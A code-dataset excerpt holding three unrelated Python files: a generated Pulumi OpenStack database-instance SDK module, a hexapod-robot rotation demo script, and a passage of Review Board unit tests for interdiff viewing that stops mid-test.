f22561268d7ec47dce1fe6b7ed191e8d20ea53a7 | 28,251 | py | Python | sdk/python/pulumi_openstack/database/instance.py | pulumi/pulumi-openstack | 945eed22a82784e9f0b3aa56168b2397c2f503e8 | ["ECL-2.0", "Apache-2.0"] | 34 | 2018-09-12T12:37:51.000Z | 2022-02-04T19:32:13.000Z | sdk/python/pulumi_openstack/database/instance.py | pulumi/pulumi-openstack | 945eed22a82784e9f0b3aa56168b2397c2f503e8 | ["ECL-2.0", "Apache-2.0"] | 72 | 2018-08-15T13:04:57.000Z | 2022-03-31T15:39:49.000Z | sdk/python/pulumi_openstack/database/instance.py | pulumi/pulumi-openstack | 945eed22a82784e9f0b3aa56168b2397c2f503e8 | ["ECL-2.0", "Apache-2.0"] | 7 | 2019-03-14T08:28:49.000Z | 2021-12-29T04:23:55.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InstanceArgs', 'Instance']
@pulumi.input_type
class InstanceArgs:
def __init__(__self__, *,
datastore: pulumi.Input['InstanceDatastoreArgs'],
size: pulumi.Input[int],
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]] = None,
region: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]] = None):
"""
The set of arguments for constructing an Instance resource.
:param pulumi.Input['InstanceDatastoreArgs'] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates a new instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
pulumi.set(__self__, "datastore", datastore)
pulumi.set(__self__, "size", size)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if flavor_id is not None:
pulumi.set(__self__, "flavor_id", flavor_id)
if name is not None:
pulumi.set(__self__, "name", name)
if networks is not None:
pulumi.set(__self__, "networks", networks)
if region is not None:
pulumi.set(__self__, "region", region)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def datastore(self) -> pulumi.Input['InstanceDatastoreArgs']:
"""
An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: pulumi.Input['InstanceDatastoreArgs']):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[int]:
"""
Specifies the volume size in GB. Changing this creates a new instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[int]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> Optional[pulumi.Input[str]]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
"""
return pulumi.get(self, "flavor_id")
@flavor_id.setter
def flavor_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flavor_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@networks.setter
def networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]):
pulumi.set(self, "networks", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]):
pulumi.set(self, "users", value)
@pulumi.input_type
class _InstanceState:
def __init__(__self__, *,
addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]] = None,
datastore: Optional[pulumi.Input['InstanceDatastoreArgs']] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]] = None):
"""
Input properties used for looking up and filtering Instance resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] addresses: A list of IP addresses assigned to the instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input['InstanceDatastoreArgs'] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates a new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
if addresses is not None:
pulumi.set(__self__, "addresses", addresses)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if datastore is not None:
pulumi.set(__self__, "datastore", datastore)
if flavor_id is not None:
pulumi.set(__self__, "flavor_id", flavor_id)
if name is not None:
pulumi.set(__self__, "name", name)
if networks is not None:
pulumi.set(__self__, "networks", networks)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP addresses assigned to the instance.
"""
return pulumi.get(self, "addresses")
@addresses.setter
def addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "addresses", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_id", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def datastore(self) -> Optional[pulumi.Input['InstanceDatastoreArgs']]:
"""
The database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: Optional[pulumi.Input['InstanceDatastoreArgs']]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> Optional[pulumi.Input[str]]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
"""
return pulumi.get(self, "flavor_id")
@flavor_id.setter
def flavor_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flavor_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@networks.setter
def networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]]):
pulumi.set(self, "networks", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the volume size in GB. Changing this creates a new instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]]):
pulumi.set(self, "users", value)
class Instance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None,
__props__=None):
"""
Create an Instance resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']] datastore: The database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates a new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
...
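# Hedged usage sketch (not part of the generated SDK): a minimal database
# instance built with the arguments documented above. The region, engine
# version, flavor UUID and network UUID below are assumed placeholder values.
#
#   import pulumi_openstack as openstack
#
#   db = openstack.database.Instance("db",
#       region="RegionOne",
#       datastore=openstack.database.InstanceDatastoreArgs(
#           type="mysql",
#           version="5.7"),
#       flavor_id="<flavor uuid>",
#       networks=[openstack.database.InstanceNetworkArgs(
#           uuid="<network uuid>")],
#       size=8)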
@overload
def __init__(__self__,
resource_name: str,
args: InstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create an Instance resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param InstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InstanceArgs.__new__(InstanceArgs)
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["databases"] = databases
if datastore is None and not opts.urn:
raise TypeError("Missing required property 'datastore'")
__props__.__dict__["datastore"] = datastore
__props__.__dict__["flavor_id"] = flavor_id
__props__.__dict__["name"] = name
__props__.__dict__["networks"] = networks
__props__.__dict__["region"] = region
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["users"] = users
__props__.__dict__["addresses"] = None
super(Instance, __self__).__init__(
'openstack:database/instance:Instance',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]]] = None,
datastore: Optional[pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]]] = None) -> 'Instance':
"""
Get an existing Instance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] addresses: A list of IP addresses assigned to the instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceDatabaseArgs']]]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[pulumi.InputType['InstanceDatastoreArgs']] datastore: The database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceNetworkArgs']]]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates a new instance.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceUserArgs']]]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceState.__new__(_InstanceState)
__props__.__dict__["addresses"] = addresses
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["databases"] = databases
__props__.__dict__["datastore"] = datastore
__props__.__dict__["flavor_id"] = flavor_id
__props__.__dict__["name"] = name
__props__.__dict__["networks"] = networks
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["users"] = users
return Instance(resource_name, opts=opts, __props__=__props__)
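# Hedged sketch (not from the generated file): adopting an existing instance's
# server-side state through the static get() defined above; the id argument is
# an assumed placeholder for a real instance UUID.
#
#   existing = Instance.get("imported-db", id="<existing instance uuid>")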
@property
@pulumi.getter
def addresses(self) -> pulumi.Output[Sequence[str]]:
"""
A list of IP addresses assigned to the instance.
"""
return pulumi.get(self, "addresses")
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> pulumi.Output[Optional[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceDatabase']]]:
"""
An array of database name, charset and collate. The database
object structure is documented below.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def datastore(self) -> pulumi.Output['outputs.InstanceDatastore']:
"""
The database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@property
@pulumi.getter(name="flavorId")
def flavor_id(self) -> pulumi.Output[str]:
"""
The flavor ID of the desired flavor for the instance.
Changing this creates a new instance.
"""
return pulumi.get(self, "flavor_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Database to be created on new instance. Changing this creates a
new instance.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def networks(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceNetwork']]]:
"""
An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
"""
return pulumi.get(self, "networks")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to create the db instance. Changing this
creates a new instance.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Specifies the volume size in GB. Changing this creates a new instance.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Optional[Sequence['outputs.InstanceUser']]]:
"""
An array of username, password, host and databases. The user
object structure is documented below.
"""
return pulumi.get(self, "users")
[previous record trailing columns: avg_line_length 45.787682 | max_line_length 165 | alphanum_fraction 0.646915 | remaining quality-signal metrics omitted]

[next record metadata]
hexsha: 1eefc9ad7bdeddb88c096cd73581531eabb1912f | size: 1,626 | ext: py | lang: Python
max_stars_repo_path: DemoMoves/RotateRight.py | max_stars_repo_name: johan--/PoMoCo_RobCook | head: 0ca95286b0f21803ed3a33cbad6d11fce4d7172a | licenses: ["MIT", "Unlicense"] | stars: 1 (2020-11-20T08:05:55.000Z)
max_issues_repo_path: DemoMoves/RotateRight.py | max_issues_repo_name: rpcook/PoMoCo | head: 08f5170006bafabc2d70d5a681b62f7448afdbd2 | licenses: ["Unlicense", "MIT"] | issues: null
max_forks_repo_path: DemoMoves/RotateRight.py | max_forks_repo_name: rpcook/PoMoCo | head: 08f5170006bafabc2d70d5a681b62f7448afdbd2 | licenses: ["Unlicense", "MIT"] | forks: null
import time
import math
from ikLibrary import * # Inverse-Kinematic Library developed by Rob Cook, information on http://robcook.eu
# scale factor (distance from neutral in step direction)
s = 23
# direction (CCW from forwards)
theta = math.pi
# define movements to walk in a particular direction
# step position 2, tripod 1 in upper mid position, tripod 2 in lower mid position
hexyTripod1GlobalOffset(0,0,-14)
hexyTripod2GlobalOffset(0,0,0)
time.sleep(0.2)
# step position 3, tripod 1 in rear position, tripod 2 in forward position
hexyTripod1GlobalOffsetRot(0,0,0,-0.15)
hexyTripod2GlobalOffsetRot(0,0,0,0.15)
time.sleep(0.2)
# step position 4, tripod 1 in lower mid position, tripod 2 in upper mid position
hexyTripod1GlobalOffset(0,0,0)
hexyTripod2GlobalOffset(0,0,-14)
time.sleep(0.2)
# step position 1, tripod 1 in forward position, tripod 2 in rear position
hexyTripod1GlobalOffsetRot(0,0,0,0.15)
hexyTripod2GlobalOffsetRot(0,0,0,-0.15)
time.sleep(0.2)
# step position 2, tripod 1 in upper mid position, tripod 2 in lower mid position
hexyTripod1GlobalOffset(0,0,-14)
hexyTripod2GlobalOffset(0,0,0)
time.sleep(0.2)
# step position 3, tripod 1 in rear position, tripod 2 in forward position
hexyTripod1GlobalOffsetRot(0,0,0,-0.15)
hexyTripod2GlobalOffsetRot(0,0,0,0.15)
time.sleep(0.2)
# step position 4, tripod 1 in lower mid position, tripod 2 in upper mid position
hexyTripod1GlobalOffset(0,0,0)
hexyTripod2GlobalOffset(0,0,-14)
time.sleep(0.2)
# step position 1, tripod 1 in forward position, tripod 2 in rear position
hexyTripod1GlobalOffsetRot(0,0,0,0.15)
hexyTripod2GlobalOffsetRot(0,0,0,-0.15)
time.sleep(0.2)
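# Hedged sketch (not part of the original demo): the two identical step cycles
# above could be collapsed into a loop. gait_cycle() is a hypothetical helper
# that only re-uses the ikLibrary calls already made in this script.
#
#   def gait_cycle(lift=-14, twist=0.15, pause=0.2):
#       hexyTripod1GlobalOffset(0, 0, lift)          # tripod 1 upper mid, tripod 2 lower mid
#       hexyTripod2GlobalOffset(0, 0, 0)
#       time.sleep(pause)
#       hexyTripod1GlobalOffsetRot(0, 0, 0, -twist)  # tripod 1 rear, tripod 2 forward
#       hexyTripod2GlobalOffsetRot(0, 0, 0, twist)
#       time.sleep(pause)
#       hexyTripod1GlobalOffset(0, 0, 0)             # tripod 1 lower mid, tripod 2 upper mid
#       hexyTripod2GlobalOffset(0, 0, lift)
#       time.sleep(pause)
#       hexyTripod1GlobalOffsetRot(0, 0, 0, twist)   # tripod 1 forward, tripod 2 rear
#       hexyTripod2GlobalOffsetRot(0, 0, 0, -twist)
#       time.sleep(pause)
#
#   for _ in range(2):
#       gait_cycle()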
[previous record trailing columns: avg_line_length 36.954545 | max_line_length 107 | alphanum_fraction 0.782288 | remaining quality-signal metrics omitted]

[next record metadata]
hexsha: 4839374e7b6329660e6e92b0d841a0f100b50a1c | size: 11,157 | ext: py | lang: Python
max_stars_repo_path: reviewboard/reviews/tests/test_reviews_diff_viewer_view.py | max_stars_repo_name: pombredanne/reviewboard | head: 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | licenses: ["MIT"] | stars: null
max_issues_repo_path: reviewboard/reviews/tests/test_reviews_diff_viewer_view.py | max_issues_repo_name: pombredanne/reviewboard | head: 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | licenses: ["MIT"] | issues: null
max_forks_repo_path: reviewboard/reviews/tests/test_reviews_diff_viewer_view.py | max_forks_repo_name: pombredanne/reviewboard | head: 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | licenses: ["MIT"] | forks: null
"""Unit tests for reviewboard.reviews.views.ReviewsDiffViewerView."""
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ReviewsDiffViewerViewTests(TestCase):
"""Unit tests for reviewboard.reviews.views.ReviewsDiffViewerView."""
fixtures = ['test_users', 'test_scmtools']
# Bug 892
def test_interdiff(self):
"""Testing ReviewsDiffViewerView with interdiffs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50866',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50866 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd3\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a new file!\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50867',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50867 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+----------\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a different version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % response.context['error'])
print(response.context['trace'])
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['diff_context']['num_diffs'], 2)
files = response.context['files']
self.assertTrue(files)
self.assertEqual(len(files), 2)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
self.assertEqual(files[1]['depot_filename'], '/readme')
self.assertIn('interfilediff', files[1])
# Bug 847
def test_interdiff_new_file(self):
"""Testing ReviewsDiffViewerView with interdiffs containing new files"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
